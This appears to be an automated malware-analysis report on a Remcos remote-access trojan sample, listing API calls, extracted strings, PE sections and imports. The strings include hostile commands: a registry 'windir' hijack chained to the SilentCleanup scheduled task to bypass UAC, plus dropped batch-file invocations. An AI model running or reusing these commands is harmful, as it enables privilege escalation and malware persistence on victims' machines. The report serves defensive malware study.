kernel32.dll.ReadProcessMemory
kernel32.dll.LockResource
kernel32.dll.LoadResource
kernel32.dll.LoadLibraryA
kernel32.dll.GetVersionExA
kernel32.dll.GetStringTypeExA
kernel32.dll.GetLocalTime
kernel32.dll.GetFullPathNameA
kernel32.dll.GetFileAttributesA
kernel32.dll.GetExitCodeThread
kernel32.dll.GetDiskFreeSpaceA
kernel32.dll.GetDateFormatA
kernel32.dll.GetCPInfo
kernel32.dll.GetACP
kernel32.dll.FormatMessageA
kernel32.dll.FindResourceA
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.FileTimeToDosDateTime
kernel32.dll.EnumCalendarInfoA
kernel32.dll.DeleteFileA
kernel32.dll.CreateRemoteThread
kernel32.dll.CreateProcessA
kernel32.dll.CreateEventA
kernel32.dll.CreateDirectoryA
kernel32.dll.CopyFileA
kernel32.dll.CompareStringA
user32.dll.CharToOemA
oleaut32.dll.SafeArrayPtrOfIndex
oleaut32.dll.SafeArrayGetUBound
oleaut32.dll.SafeArrayGetLBound
oleaut32.dll.SafeArrayCreate
oleaut32.dll.VariantChangeType
oleaut32.dll.VariantCopy
oleaut32.dll.VariantClear
oleaut32.dll.VariantInit
shell32.dll.ShellExecuteA
urlmon.dll.URLDownloadToFileA
kernel32.dll.ExitThread
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
cryptbase.dll.SystemFunction036
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
sspicli.dll.GetUserNameExW
ole32.dll.CoCreateInstance
secur32.dll.InitSecurityInterfaceW
cryptsp.dll.SystemFunction035
shell32.dll.ShellExecuteExW
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
duser.dll.InvalidateGadget
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
kernel32.dll.RegQueryValueExW
kernel32.dll.IsBadReadPtr
kernel32.dll.CreateMutexA
kernel32.dll.OpenMutexA
kernel32.dll.Process32NextW
kernel32.dll.Process32FirstW
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.OpenProcess
kernel32.dll.GetCurrentProcessId
kernel32.dll.lstrcatW
kernel32.dll.GetTempFileNameW
kernel32.dll.GetTempPathW
kernel32.dll.GetTickCount
kernel32.dll.GlobalUnlock
kernel32.dll.GlobalLock
kernel32.dll.GlobalAlloc
kernel32.dll.CopyFileW
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.GetThreadContext
kernel32.dll.CreateProcessW
kernel32.dll.GlobalFree
kernel32.dll.DuplicateHandle
kernel32.dll.GetCurrentThread
kernel32.dll.GetLongPathNameW
kernel32.dll.AllocConsole
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.FindNextFileA
kernel32.dll.CreateFileMappingA
kernel32.dll.MapViewOfFileEx
kernel32.dll.RemoveDirectoryW
kernel32.dll.SetFileAttributesW
kernel32.dll.TerminateThread
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GetFileAttributesW
kernel32.dll.DeleteFileW
kernel32.dll.GetDriveTypeA
kernel32.dll.FindFirstFileW
kernel32.dll.FindNextFileW
kernel32.dll.CreatePipe
kernel32.dll.PeekNamedPipe
kernel32.dll.TerminateProcess
kernel32.dll.HeapCreate
kernel32.dll.HeapFree
kernel32.dll.CreateThread
kernel32.dll.GetModuleFileNameW
kernel32.dll.CreateDirectoryW
kernel32.dll.CreateFileW
kernel32.dll.GetCurrentProcess
user32.dll.AppendMenuA
user32.dll.RegisterClassExA
user32.dll.CreateWindowExA
user32.dll.SystemParametersInfoW
user32.dll.SendInput
user32.dll.mouse_event
user32.dll.GetIconInfo
user32.dll.DrawIcon
user32.dll.EnumWindows
user32.dll.GetWindowTextW
user32.dll.IsWindowVisible
user32.dll.CloseWindow
user32.dll.GetWindowThreadProcessId
user32.dll.GetKeyboardLayoutNameA
user32.dll.MessageBoxW
user32.dll.ExitWindowsEx
user32.dll.EmptyClipboard
user32.dll.CreatePopupMenu
user32.dll.ShowWindow
user32.dll.SetWindowTextW
user32.dll.SetForegroundWindow
user32.dll.OpenClipboard
user32.dll.GetClipboardData
user32.dll.CloseClipboard
user32.dll.UnhookWindowsHookEx
user32.dll.GetForegroundWindow
user32.dll.GetWindowTextLengthA
user32.dll.GetWindowTextA
user32.dll.GetKeyState
user32.dll.CallNextHookEx
user32.dll.SetWindowsHookExA
user32.dll.GetKeyboardLayout
user32.dll.GetMessageA
user32.dll.TranslateMessage
user32.dll.TrackPopupMenu
user32.dll.GetCursorPos
user32.dll.SetClipboardData
user32.dll.DefWindowProcA
user32.dll.DispatchMessageA
gdi32.dll.CreateDCA
gdi32.dll.CreateCompatibleDC
gdi32.dll.GetDeviceCaps
gdi32.dll.CreateCompatibleBitmap
gdi32.dll.DeleteDC
gdi32.dll.DeleteObject
gdi32.dll.SelectObject
gdi32.dll.GetDIBits
gdi32.dll.GetObjectA
gdi32.dll.StretchBlt
advapi32.dll.RegDeleteKeyA
advapi32.dll.RegEnumKeyExA
advapi32.dll.GetUserNameW
advapi32.dll.ChangeServiceConfigW
advapi32.dll.QueryServiceStatus
advapi32.dll.ControlService
advapi32.dll.OpenSCManagerW
advapi32.dll.StartServiceW
advapi32.dll.OpenSCManagerA
advapi32.dll.EnumServicesStatusW
advapi32.dll.OpenServiceW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCreateKeyA
advapi32.dll.RegSetValueExW
advapi32.dll.RegCreateKeyW
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumValueW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegCreateKeyExW
advapi32.dll.AdjustTokenPrivileges
advapi32.dll.LookupPrivilegeValueA
advapi32.dll.OpenProcessToken
advapi32.dll.CloseServiceHandle
advapi32.dll.QueryServiceConfigW
shell32.dll.ExtractIconA
shell32.dll.Shell_NotifyIconA
shell32.dll.ShellExecuteExA
shell32.dll.ShellExecuteW
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll.??1type_info@@UAE@XZ
msvcrt.dll._onexit
msvcrt.dll.__dllonexit
msvcrt.dll._iob
msvcrt.dll.freopen
msvcrt.dll.wcscat
msvcrt.dll._itow
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._wsystem
msvcrt.dll.wcscpy
msvcrt.dll.wcslen
msvcrt.dll._wgetenv
msvcrt.dll.toupper
msvcrt.dll.sprintf
msvcrt.dll.tolower
msvcrt.dll.wcscmp
msvcrt.dll._wrename
msvcrt.dll.exit
msvcrt.dll.getenv
msvcrt.dll.printf
msvcrt.dll.strncmp
msvcrt.dll.malloc
msvcrt.dll.free
msvcrt.dll._EH_prolog
msvcrt.dll.__CxxFrameHandler
msvcrt.dll.??3@YAXPAX@Z
msvcrt.dll._CxxThrowException
msvcrt.dll.??0exception@@QAE@ABV0@@Z
msvcrt.dll.time
msvcrt.dll.localtime
msvcrt.dll.strftime
msvcrt.dll.atoi
msvcrt.dll._ftol
msvcrt.dll.??2@YAPAXI@Z
msvcrt.dll.swprintf
msvcrt.dll._itoa
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z
msvcp60.dll.?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z
msvcp60.dll.??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
msvcp60.dll.??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
msvcp60.dll.?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
msvcp60.dll.??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
msvcp60.dll.?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ
msvcp60.dll.??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
msvcp60.dll.??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z
msvcp60.dll.??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z
msvcp60.dll.?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z
msvcp60.dll.?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
msvcp60.dll.?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z
msvcp60.dll.?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z
msvcp60.dll.?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
msvcp60.dll.??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
msvcp60.dll.?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ
msvcp60.dll.??0Init@ios_base@std@@QAE@XZ
msvcp60.dll.??1Init@ios_base@std@@QAE@XZ
msvcp60.dll.??0_Winit@std@@QAE@XZ
msvcp60.dll.??1_Winit@std@@QAE@XZ
msvcp60.dll.?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
msvcp60.dll.?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
msvcp60.dll.??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z
msvcp60.dll.?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z
msvcp60.dll.?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
msvcp60.dll.?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
msvcp60.dll.?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
msvcp60.dll.?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z
msvcp60.dll.?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z
msvcp60.dll.?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z
msvcp60.dll.?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ
msvcp60.dll.?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
msvcp60.dll.?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ
msvcp60.dll.?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z
msvcp60.dll.?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ
msvcp60.dll.?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z
msvcp60.dll.?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
msvcp60.dll.??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z
msvcp60.dll.?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
msvcp60.dll.?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z
msvcp60.dll.?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z
msvcp60.dll.?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
msvcp60.dll.??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z
msvcp60.dll.??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
msvcp60.dll.??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
msvcp60.dll.??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
msvcp60.dll.??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z
msvcp60.dll.?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ
msvcp60.dll.??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
msvcp60.dll.?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
msvcp60.dll.??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ
msvcp60.dll.?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z
msvcp60.dll.?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z
msvcp60.dll.?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
msvcp60.dll.??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z
msvcp60.dll.??1out_of_range@std@@UAE@XZ
msvcp60.dll.??0out_of_range@std@@QAE@ABV01@@Z
msvcp60.dll.??0logic_error@std@@QAE@ABV01@@Z
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z
msvcp60.dll.??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z
msvcp60.dll.??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z
msvcp60.dll.??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
msvcp60.dll.?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z
msvcp60.dll.?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
msvcp60.dll.??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
msvcp60.dll.??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z
msvcp60.dll.??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
msvcp60.dll.??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z
shlwapi.dll.PathFileExistsW
shlwapi.dll.PathFileExistsA
shlwapi.dll.StrToIntA
winmm.dll.PlaySoundW
winmm.dll.mciSendStringA
winmm.dll.waveInStop
winmm.dll.waveInOpen
winmm.dll.waveInClose
winmm.dll.waveInUnprepareHeader
winmm.dll.waveInPrepareHeader
winmm.dll.mciSendStringW
winmm.dll.waveInAddBuffer
winmm.dll.waveInStart
ws2_32.dll.#9
ws2_32.dll.#52
ws2_32.dll.#3
ws2_32.dll.#12
ws2_32.dll.#23
ws2_32.dll.#4
ws2_32.dll.#16
ws2_32.dll.#19
ws2_32.dll.#115
urlmon.dll.URLDownloadToFileW
urlmon.dll.URLOpenBlockingStreamW
gdiplus.dll.GdipLoadImageFromStreamICM
gdiplus.dll.GdipLoadImageFromStream
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipCloneImage
gdiplus.dll.GdipAlloc
gdiplus.dll.GdipSaveImageToStream
gdiplus.dll.GdipSaveImageToFile
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipFree
wininet.dll.InternetCloseHandle
wininet.dll.InternetOpenUrlA
wininet.dll.InternetOpenA
wininet.dll.InternetReadFile
user32.dll.GetCursorInfo
user32.dll.GetLastInputInfo
kernel32.dll.GetConsoleWindow
psapi.dll.GetModuleFileNameExA
psapi.dll.GetModuleFileNameExW
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.IsWow64Process
kernel32.dll.GetComputerNameExW
shell32.dll.IsUserAnAdmin
kernel32.dll.SetProcessDEPPolicy
"C:\Users\Public\Natso.bat"
cmd /c ""C:\Users\Public\Natso.bat" "
"C:\Users\Public\Yeso.bat"
cmd /c ""C:\Users\Public\Yeso.bat" "
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe
reg delete hkcu\Environment /v windir /f
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
"C:\Windows \System32\perfmon.exe"
C:\Windows \System32\perfmon.exe
Remcos_Mutex_Inj
Remcos-GMZ5DV

PE Information

Image Base 0x00400000
Entry Point 0x0046012c
Reported Checksum 0x00000000
Actual Checksum 0x001781cb
Minimum OS Version 4.0
Compile Time 1992-06-19 22:22:17
Import Hash 1485be28b39750a17c94ed310167c8e6

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Characteristics                                                         Entropy
CODE    0x00001000       0x0005f17c    0x0005f200        IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ             6.54
DATA    0x00061000       0x00001208    0x00001400        IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE   3.88
BSS     0x00063000       0x0007ad39    0x00000000        IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE                                  0.00
.idata  0x000de000       0x000023cc    0x00002400        IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE   5.05
.tls    0x000e1000       0x00000010    0x00000000        IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE                                  0.00
.rdata  0x000e2000       0x00000018    0x00000200        IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ  0.19
.reloc  0x000e3000       0x00006650    0x00006800        IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ  6.64
.rsrc   0x000ea000       0x00005800    0x00005800        IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ  4.22

Overlay

Offset 0x0006f000
Size 0x00101c0c

Imports

Library kernel32.dll:
0x4de13c VirtualFree
0x4de140 VirtualAlloc
0x4de144 LocalFree
0x4de148 LocalAlloc
0x4de14c GetVersion
0x4de150 GetCurrentThreadId
0x4de15c VirtualQuery
0x4de160 WideCharToMultiByte
0x4de164 MultiByteToWideChar
0x4de168 lstrlenA
0x4de16c lstrcpynA
0x4de170 LoadLibraryExA
0x4de174 GetThreadLocale
0x4de178 GetStartupInfoA
0x4de17c GetProcAddress
0x4de180 GetModuleHandleA
0x4de184 GetModuleFileNameA
0x4de188 GetLocaleInfoA
0x4de18c GetLastError
0x4de190 GetCommandLineA
0x4de194 FreeLibrary
0x4de198 FindFirstFileA
0x4de19c FindClose
0x4de1a0 ExitProcess
0x4de1a4 WriteFile
0x4de1ac SetFilePointer
0x4de1b0 SetEndOfFile
0x4de1b4 RtlUnwind
0x4de1b8 ReadFile
0x4de1bc RaiseException
0x4de1c0 GetStdHandle
0x4de1c4 GetFileSize
0x4de1c8 GetFileType
0x4de1cc CreateFileA
0x4de1d0 CloseHandle
Library user32.dll:
0x4de1d8 GetKeyboardType
0x4de1dc LoadStringA
0x4de1e0 MessageBoxA
0x4de1e4 CharNextA
Library advapi32.dll:
0x4de1ec RegQueryValueExA
0x4de1f0 RegOpenKeyExA
0x4de1f4 RegCloseKey
Library oleaut32.dll:
0x4de1fc SysFreeString
0x4de200 SysReAllocStringLen
0x4de204 SysAllocStringLen
Library kernel32.dll:
0x4de20c TlsSetValue
0x4de210 TlsGetValue
0x4de214 LocalAlloc
0x4de218 GetModuleHandleA
Library advapi32.dll:
0x4de220 RegQueryValueExA
0x4de224 RegOpenKeyExA
0x4de228 RegCloseKey
Library kernel32.dll:
0x4de230 lstrcpyA
0x4de234 WriteFile
0x4de238 WaitForSingleObject
0x4de23c VirtualQuery
0x4de240 VirtualProtect
0x4de244 VirtualAlloc
0x4de248 Sleep
0x4de24c SizeofResource
0x4de250 SetThreadLocale
0x4de254 SetFilePointer
0x4de258 SetEvent
0x4de25c SetErrorMode
0x4de260 SetEndOfFile
0x4de264 ResetEvent
0x4de268 ReadFile
0x4de26c MulDiv
0x4de270 LockResource
0x4de274 LoadResource
0x4de278 LoadLibraryA
0x4de284 GlobalUnlock
0x4de288 GlobalReAlloc
0x4de28c GlobalHandle
0x4de290 GlobalLock
0x4de294 GlobalFree
0x4de298 GlobalFindAtomA
0x4de29c GlobalDeleteAtom
0x4de2a0 GlobalAlloc
0x4de2a4 GlobalAddAtomA
0x4de2a8 GetVersionExA
0x4de2ac GetVersion
0x4de2b0 GetTickCount
0x4de2b4 GetThreadLocale
0x4de2b8 GetSystemInfo
0x4de2bc GetStringTypeExA
0x4de2c0 GetStdHandle
0x4de2c4 GetProcAddress
0x4de2c8 GetModuleHandleA
0x4de2cc GetModuleFileNameA
0x4de2d0 GetLocaleInfoA
0x4de2d4 GetLocalTime
0x4de2d8 GetLastError
0x4de2dc GetFullPathNameA
0x4de2e0 GetDiskFreeSpaceA
0x4de2e4 GetDateFormatA
0x4de2e8 GetCurrentThreadId
0x4de2ec GetCurrentProcessId
0x4de2f0 GetCPInfo
0x4de2f4 GetACP
0x4de2f8 FreeResource
0x4de2fc InterlockedExchange
0x4de300 FreeLibrary
0x4de304 FormatMessageA
0x4de308 FindResourceA
0x4de30c FindFirstFileA
0x4de310 FindClose
0x4de31c EnumCalendarInfoA
0x4de328 CreateThread
0x4de32c CreateFileA
0x4de330 CreateEventA
0x4de334 CompareStringA
0x4de338 CloseHandle
Library version.dll:
0x4de340 VerQueryValueA
0x4de348 GetFileVersionInfoA
Library gdi32.dll:
0x4de350 UnrealizeObject
0x4de354 StretchBlt
0x4de358 SetWindowOrgEx
0x4de35c SetWindowExtEx
0x4de360 SetWinMetaFileBits
0x4de364 SetViewportOrgEx
0x4de368 SetViewportExtEx
0x4de36c SetTextColor
0x4de370 SetStretchBltMode
0x4de374 SetROP2
0x4de378 SetPixel
0x4de37c SetMapMode
0x4de380 SetEnhMetaFileBits
0x4de384 SetDIBColorTable
0x4de388 SetBrushOrgEx
0x4de38c SetBkMode
0x4de390 SetBkColor
0x4de394 SelectPalette
0x4de398 SelectObject
0x4de39c SaveDC
0x4de3a0 RestoreDC
0x4de3a4 Rectangle
0x4de3a8 RectVisible
0x4de3ac RealizePalette
0x4de3b0 PolyPolyline
0x4de3b4 PlayEnhMetaFile
0x4de3b8 PatBlt
0x4de3bc MoveToEx
0x4de3c0 MaskBlt
0x4de3c4 LineTo
0x4de3c8 IntersectClipRect
0x4de3cc GetWindowOrgEx
0x4de3d0 GetWinMetaFileBits
0x4de3d4 GetTextMetricsA
0x4de3d8 GetTextExtentPointA
0x4de3e4 GetStockObject
0x4de3e8 GetPixel
0x4de3ec GetPaletteEntries
0x4de3f0 GetObjectA
0x4de3fc GetEnhMetaFileBits
0x4de400 GetDeviceCaps
0x4de404 GetDIBits
0x4de408 GetDIBColorTable
0x4de40c GetDCOrgEx
0x4de414 GetClipBox
0x4de418 GetBrushOrgEx
0x4de41c GetBitmapBits
0x4de420 ExtCreatePen
0x4de424 ExcludeClipRect
0x4de428 Ellipse
0x4de42c DeleteObject
0x4de430 DeleteEnhMetaFile
0x4de434 DeleteDC
0x4de438 CreateSolidBrush
0x4de43c CreatePenIndirect
0x4de440 CreatePalette
0x4de448 CreateFontIndirectA
0x4de44c CreateDIBitmap
0x4de450 CreateDIBSection
0x4de454 CreateCompatibleDC
0x4de45c CreateBrushIndirect
0x4de460 CreateBitmap
0x4de464 CopyEnhMetaFileA
0x4de468 BitBlt
Library user32.dll:
0x4de470 CreateWindowExA
0x4de474 WindowFromPoint
0x4de478 WinHelpA
0x4de47c WaitMessage
0x4de480 ValidateRect
0x4de484 UpdateWindow
0x4de488 UnregisterClassA
0x4de48c UnionRect
0x4de490 UnhookWindowsHookEx
0x4de494 TranslateMessage
0x4de49c TrackPopupMenu
0x4de4a4 ShowWindow
0x4de4a8 ShowScrollBar
0x4de4ac ShowOwnedPopups
0x4de4b0 ShowCursor
0x4de4b4 SetWindowsHookExA
0x4de4b8 SetWindowTextA
0x4de4bc SetWindowPos
0x4de4c0 SetWindowPlacement
0x4de4c4 SetWindowLongA
0x4de4c8 SetTimer
0x4de4cc SetScrollRange
0x4de4d0 SetScrollPos
0x4de4d4 SetScrollInfo
0x4de4d8 SetRect
0x4de4dc SetPropA
0x4de4e0 SetParent
0x4de4e4 SetMenuItemInfoA
0x4de4e8 SetMenu
0x4de4ec SetKeyboardState
0x4de4f0 SetForegroundWindow
0x4de4f4 SetFocus
0x4de4f8 SetCursor
0x4de4fc SetClipboardData
0x4de500 SetClassLongA
0x4de504 SetCapture
0x4de508 SetActiveWindow
0x4de50c SendMessageA
0x4de510 ScrollWindowEx
0x4de514 ScrollWindow
0x4de518 ScreenToClient
0x4de51c RemovePropA
0x4de520 RemoveMenu
0x4de524 ReleaseDC
0x4de528 ReleaseCapture
0x4de534 RegisterClassA
0x4de538 RedrawWindow
0x4de53c PtInRect
0x4de540 PostQuitMessage
0x4de544 PostMessageA
0x4de548 PeekMessageA
0x4de54c OpenClipboard
0x4de550 OffsetRect
0x4de554 OemToCharA
0x4de558 MessageBoxA
0x4de55c MessageBeep
0x4de560 MapWindowPoints
0x4de564 MapVirtualKeyA
0x4de568 LoadStringA
0x4de56c LoadKeyboardLayoutA
0x4de570 LoadIconA
